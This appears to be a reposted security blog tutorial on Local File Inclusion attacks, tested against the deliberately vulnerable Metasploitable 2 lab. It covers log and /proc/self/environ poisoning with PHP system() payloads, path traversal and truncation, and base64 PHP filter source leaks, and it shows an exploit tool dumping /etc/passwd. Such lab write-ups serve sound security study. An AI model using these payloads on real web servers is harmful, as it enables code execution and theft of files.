LFI Exploitation : Basics, code execution and information leak

[Nytro]

[h=3]LFI Exploitation : Basics, code execution and information leak [/h]Hello,

Today, I played a bit with Metasploitable 2.

It is really easy to root, so that's not the interest of this blog post.

Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool.

So yet another post on LFI exploitation ...

[h=2]So what is LFI?[/h]

LFI stands for Local File Inclusion.

It is a vulnerability that allows you to include local files.

Many people do think that it's not really dangerous as it only includes LOCAL files.

Unfortunately (depending on which side of the barrier you are ...), it is false, you can execute code through a LFI.

[h=2]So, how do you exploit it?[/h]

By including local files.

Yes, local files .

These are the well-known techniques for LFI:

- apache logs

- /proc/self/environ

- php://input

- NULL Byte Injection

- path truncation

- directory traversal

- PHP filters

- image inclusion with PHP code

[h=3]Apache logs[/h]These were publicly accessible in old distros.

Now, these are only readable by proper users.

You'd basically inject PHP Code through the GET requests:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]http://victim/<?php system ('id'); ?>

[/TD]

[/TR]

[/TABLE]

This would leave PHP code in the logs.

Then executing the PHP code is as simple as:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]http://victim/?page=/var/log/apache2/access_log

[/TD]

[/TR]

[/TABLE]

Code execution if there is no proper rights on the logs (some old systems remain).

[h=3]/proc/self/environ[/h]

This file is interesting as it stores stuffs like your USER-AGENT and whatsoever.

So, if you change your User-Agent to

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]<?php system ('id'); ?>

[/TD]

[/TR]

[/TABLE]

and use this:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]http://victim/?page=/proc/self/environ

[/TD]

[/TR]

[/TABLE]

Yes, code execution!

[h=3]php://input[/h]Ok, this one execute PHP Code included into the POST DATA.

[h=3]NULL byte injection and path truncation[/h]This one is pretty neat.

Say you have the following code:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]<?php include ($_GET['page'] . '.php'); ?>

[/TD]

[/TR]

[/TABLE]

Well, you can get rid of the '.php' extension using that trick.

Just append or looooooots of . or /., this will get normalized and voila no more extension.

NULL Byte poisoning doesn't work for PHP >= 5.3.4 as it's been fixed.

Reverse path truncation is mostly the same, just the ../ is before the file name.

[h=3]PHP filters[/h]This vulnerability is mainly for leaking files (.php and others).

This doesn't work if you have a prefix such as here:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]<?php include ($prefix + $_GET['page'] + '.php'); ?>

[/TD]

[/TR]

[/TABLE]

You exploit it using this request for instance:

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php

[/TD]

[/TR]

[/TABLE]

As you guessed, the PHP filter is

?

[TABLE]

[TR]

[TD=class: gutter]1

[/TD]

[TD=class: code]php://filter/read=convert.base64-encode/resource=

[/TD]

[/TR]

[/TABLE]

.

[h=3]image with PHP code[/h]

This one is about appending PHP code in an image.

Using the image in the LFI allows you to inject PHP code : the PHP interpreter interprets anything as code as long as it's in <?php ?>.

If you have a non exploitable LFI with /proc/self/environ or apaches logs and you don't have an extension concatenation, this can allow you to exploit it if you are able to upload images.

Let's say you have PHPBB and PhpLdapAdmin 1.1.0.5.

Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.

[h=2]Exploit[/h]

I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks.

You can get it at LFI exploit tool .

The code isn't clean and it needs tons of improvement before being really a usable tool. I plan on improving it on a need to basis. The cookie functionality is not implemented yet, it is just a placeholder for now.

You can test it on multilidae on Metasploitable 2. I haven't tested it somewhere else yet.

Example of utilisation (this is on metasploitable 2):

$ ./exploit-lfi.py -h
usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION
                      [--replace REPLACE] [--cookie COOKIE]

Exploit LFI

optional arguments:
  -h, --help            show this help message and exit
  --url URL, -u URL     URL to attack
  --action ACTION, -a ACTION
                        exec or read (default)
  --option OPTION, -o OPTION
                        Action argument
  --replace REPLACE, -r REPLACE
                        string to replace
  --cookie COOKIE, -c COOKIE
                        Cookie
$ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd'
[+] Checking vulnerability
Test url : http://192.168.56.107/mutillidae/index.php?page=whatever&
Is vulnerable with param page!
[+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD&
[+] Searching for root path
root : ../../../
[+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD&
[+] Testing : {'path': '/proc/self/environ', 'type': 'header'}
    http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ&
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

[h=2]Conclusion[/h]As you can see in this introduction, code execution is quite possible with a LFI.

These aren't only information leaks vulnerabilities.

That's all for today.

Cheers,

m_101

Updates

- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.

[h=2]References[/h]

- Basics on file inclusion : File Inclusion - Security101 - Blackhat Techniques - Hacking Tutorials - Vulnerability Research - Security Tools

- PhpLdapAdmin LFI : phpldapadmin Local File Inclusion

- path truncation part 1 : ush.it - a beautiful place

- path truncation part 2 : ush.it - a beautiful place

Sursa: Binary world for binary people : LFI Exploitation : Basics, code execution and information leak